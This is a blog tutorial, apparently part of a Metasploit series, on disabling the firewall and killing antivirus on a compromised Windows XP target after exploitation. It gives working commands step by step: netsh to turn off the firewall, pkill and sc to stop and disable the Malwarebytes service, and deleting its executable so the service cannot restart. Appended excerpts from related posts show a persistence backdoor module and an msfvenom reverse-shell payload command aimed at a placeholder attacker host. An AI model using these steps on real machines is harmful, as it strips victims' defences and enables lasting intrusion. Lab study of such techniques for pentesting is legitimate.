Firewall and Anti-virus concepts - Metasploit Part 4

-

                Firewall and Antivirus Concepts



Hey folks back again witht the series and here we are going to learn how to disable firewall and antivirus on the target windows xp machine

I strongly recommend you to go throught the previous blog posts inorder to understand what we about to discuss .

So Considering that fact that we have already exploited the target machine and now its time to disable the firewall on the target windows xp machine but before that lets perfrom an nmap firewall detection scan on it

Command :

sudo nmap -sA [target ip] --reason -T4

Fig : 1.1


So in Fig : 1.1 we can see that we are able to get responses only from ports 139 and 445 cause the file and printer sharing  is enabled on the target system but what if we want to scan and exploit ports under firewall ? we have no option but to turn off the firewall right ? so lets do it through the meterpreter sessions

Command :

netsh firewall set opmode mode=DISABLE

Fig  1.2


In Fig : 1.2 we can see that we are able run the command sucessfully , So let see if it actually worked on the target machine

Fig : 1.3


In Fig : 1.3 we could see that our command worked great , and I swear I haven't turned it off manually :) , you can try it yourselves

So the firewall is turned off , lets perfrom a firewall detection scan again on the target machine

Command :

sudo nmap -sA [target_ip] --reason -T4

Fig : 1.4



In Fig : 1.4 we can see that the scan concludes that all the 1000 are unfiltered !

And similarly you can turn it back on as well 

Command :

netsh firewall set opmode mode=ENABLE

Fig : 1.5


Ending Antivirus process

So firstly lets list the process on the target machine

Command :

ps

Fig : 1.6



In Fig : 1.6 we can see there is an anti-malware software named Malwarebytes Anti-Malware running on the target machine

To specifically view the processes of Malwarebytes , we can filter them by name

Command :

pgrep mbam

Fig : 1.7


So In Fig: 1.7 we can see that there are exactly 3 processes running on the target machine that are related to Malwarebytes software

Now lets use the kill command to kill the process , wait you know what we can use pkill to kill all the process by name

Command :

pkill mbam

Fig : 1.8


In Fig 1.8 we can see all the processes related to malwarebytes have been killed !

So did we succeed in killing the anti-malware software ?

Lets see by listing the processes again

Fig : 1.9



In Fig : 1.9 The process of MalwareBytes did not get respawned , But there are caseses where they get respawned again and again after killing them

I feel like those kind of processes have more lifes than undertaker




Even if we kill the processes again they will respawn again and again , but yes some anti-virus processes might have a threshold limit and stop respawning but some are never gonna give up


So  if you have caught up in a situtation  like that then lets go the other way to stop the service

So for instance lets say that Malwarebytes process is getting respawned again

Get into the shell of the target machine and follow up

 Make sure you are at location C:\Windows\system32 and you have SYSTEM level privilage

Command :

sc query

search for the service thats been running

In my case it is MBAMService.exe

Command :

sc stop "MBAMService"

This stops the service

We shall not only stop the service , we should make sure that it won't be able to start if the machine is rebooted as well

Command :

sc config "MBAMService" start= disabled

This command will disable the process and won't let it start on boot

And finally you can view the status of the service

Command :

sc query "MBAMService"

But lets say that this method did not work for you or you couldn't stop your service as it is non-stoppable or you have been going through paranoia then the other method is that we can simply rename the service file so that other processes could not execute it and which prevents it from respawaning it

Firstly go the C:\Program Files and then search for the folder of you anti-virus service which is MalwareBytes in my case . Refer Fig : 2.0

Fig : 2.0



Now get into the folder and search for the service file

Fig : 2.1


In Fig : 2.1 we can see the name of the service file as mbamservice.exe in my case

Now don't delete the file directly , we don't want to damage the property while performing a pentest do we ? so firstly make a backup file before deleting it  

Command :

copy mbamservice.exe mbamservice.exe.bak

Now we have the backup file we can delete the actual file

Command :

del mbamservice.exe

And the boom ! if you try to execute the anti-software again , its just gonna try search and execute mbamservice.exe which ins't actually present on the target machine  after few trys when it reaches its threshold it simply returns a dialogue box which looks something like Fig : 2.2 and this is the same case if we reboot the machine

Fig : 2.2


And so these are some of the techiques we can use to get rid of firewall and anti-virus softwares :)

Comments

Post a Comment

Popular posts from this blog

Learning Nmap Host Discovery with iptables and Wireshark Analysis

-
Image
Learning Nmap Host Discovery with Iptables  and Wireshark Analysis Finally the wait is no longer , we are going to learn host discovery using nmap in a very detailed way. Well you might say that there are many videos and blogs out there what is special about this one ? , In this blog I will be sharing my knowledge after going through several videos , nmap book and many other blogs in the most detailed way possible , well you will see the difference after going through the blog . When I say I really mean it . Heads up !! you must know basis of iptables before going through the blog  and you might ask why ? coz we not just learning just by saying that nmap blocks the packets so this host discovery isn't going to work.  we are going to block the packets and run the discovery again and bypass the our rules ourselves that how this blog is designed very thing is practical practical and practical . How cool is that ?!. well I wrote blog on iptables just for you !! click here an...
Read more

Persistence Techniques with Metasploit - Part 6

-
Image
     Persistence Techniques with Metasploit Getting a shell in real world requries a lot of hardwork and research , All this work put in so that we will be ok to loose the session when the user logs off or turns the computer off ? Hell no ! , we need to make our connection persistance so that we can get back alive when the computer's on or when the user logs in. And we will be taking a look into the post module section which helps us to make our connection persistence after exploiting the target machine. Note : For creating a persistence backdoor you should have already compromised the target machine and have the meterpreter shell  Pov : you have already exploited the target machine and had a meterpreter shell Commands :  use exploit/windows/local/persistence_exe show options Fig : 1.1 In Fig : 1.1 we can see the different options availabe REXENAME option defines the name of the exe file the module is going to put on the remote system REXEPATH denotes the local ...
Read more

Generating Payloads using Msfvenom - Metasploit Part 5

-
Image
Generating and encoding Payloads using  Msfvenom Well aparantely msfvenom is a seperate tool from msfconsole which is used to generate payloads but it doesn't mean that we cannot create payloads using msfconsole but the advantage of using msfvenom is that there is no need for us to be in the msfconsole to generate payloads but no worries we will be covering both the methods :) So let's hop onto it shall we ! Command : msfvenom --list Fig : 1.1 In Fig : 1.1 we can see using the command we can list a brief instructions on how to use different options with it To list different types of modules we can use Command : msfvenom --list [modules] eg:payloads Fig : 1.2 In Fig : 1.2 we can see the different types of available payloads we can use with msfvenom and obviously it is going to take a while when you execute the command to load loads of payloads Let's create a meterpreter staged payload Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port_number -...
Read more